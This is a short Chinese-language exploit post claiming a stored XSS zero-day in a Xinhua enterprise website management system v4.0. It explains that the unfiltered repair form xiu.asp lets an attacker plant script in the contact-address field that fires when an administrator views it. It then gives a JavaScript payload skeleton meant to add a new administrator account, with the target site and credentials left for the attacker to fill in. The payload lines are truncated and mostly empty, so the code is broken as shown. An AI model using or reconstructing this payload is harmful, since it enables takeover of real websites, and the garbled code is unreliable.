From:B0mbErM@n
描述:在线报修功能未进行提交过滤
分析:xiu.asp未进行提交过滤,导致执行任意XSS语句,
新华企业网站管理系统v4.0 XSS0day添加管理员及修补
。修补:过滤
Exp:
../xiu.asp直接进入报修,然后在联系地址中写上
然后提交,等管理阅读后触发XSS执行JS代码。
Js Code(目标站、用户名和密码需要你自己替换):
document.writeln("
document.writeln("");
document.writeln(" ");
document.writeln("");
document.writeln(" ");
document.writeln("");
document.writeln(" ");
document.writeln("");
document.writeln("